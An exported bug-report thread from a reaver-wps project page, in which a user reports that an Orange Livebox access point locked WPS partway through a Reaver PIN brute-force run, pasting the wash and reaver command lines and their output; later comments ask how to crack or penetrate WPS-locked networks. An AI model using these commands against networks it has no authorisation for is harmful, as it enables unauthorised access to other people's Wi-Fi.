TH3GR3AT3STT3AM / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

WPS Locked #382

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

1.4

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5 R2

2. Is your wireless card in monitor mode (yes/no)?

Yes of course

3. What is the signal strength of the Access Point you are trying to crack?

-68

4. What is the manufacturer and model # of the device you are trying to
crack?

Livebox by Orange

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -p 12345670 -c 6

6. Please describe what you think the issue is.

The AP lock the WPS security

7. Paste the output from Reaver below.

root@bt:~/reaver-1.4/src# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked    
    ESSID
--------------------------------------------------------------------------------
-------------------------------
XX:XX:XX:XX:XX:XX       6            -68        1.0               No            
    Livebox-xxxx
^C
root@bt:~/reaver-1.4/src# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -p 12345670 -c 6

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Livebox-xxxx)
[+] 90.96% complete @ 2012-08-22 16:06:45 (2 seconds/pin)
[+] 91.01% complete @ 2012-08-22 16:06:59 (2 seconds/pin)
[+] 91.04% complete @ 2012-08-22 16:07:26 (4 seconds/pin)
[+] 91.08% complete @ 2012-08-22 16:07:40 (3 seconds/pin)
^C
[+] Session saved.
root@bt:~/reaver-1.4/src# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -p 12345670 -c 6 
-vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Livebox-xxxx)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Nothing done, nothing to save.
root@bt:~/reaver-1.4/src# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked    
    ESSID
--------------------------------------------------------------------------------
-------------------------------
XX:XX:XX:XX:XX:XX       6            -68        1.0               Yes           
    Livebox-xxxx
^C

Original issue reported on code.google.com by ad...@soluceinfo.fr on 22 Aug 2012 at 6:23

GoogleCodeExporter commented 8 years ago
The WPS was unlocked you lust restard reaver later ;)

Original comment by yacine.b...@gmail.com on 5 Nov 2012 at 9:43

GoogleCodeExporter commented 8 years ago
if someone want to crack 'wps locked' on yes how is he will crack that? Can 
someone explain this question for me ?

Original comment by t4kokari...@gmail.com on 20 Feb 2013 at 5:56

GoogleCodeExporter commented 8 years ago
if WPS Locked = Yes. We have to do? Please help me!!!

Original comment by 10102...@student.hcmute.edu.vn on 2 Jul 2013 at 4:38

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
In my case, although a network is listed under my Wifi network list but when I 
run <wash -i mon0 -C>, no network is listed. Why so? And how to penetrate such 
network? I use kali Linux. 

Original comment by sbarule...@gmail.com on 24 Dec 2014 at 2:17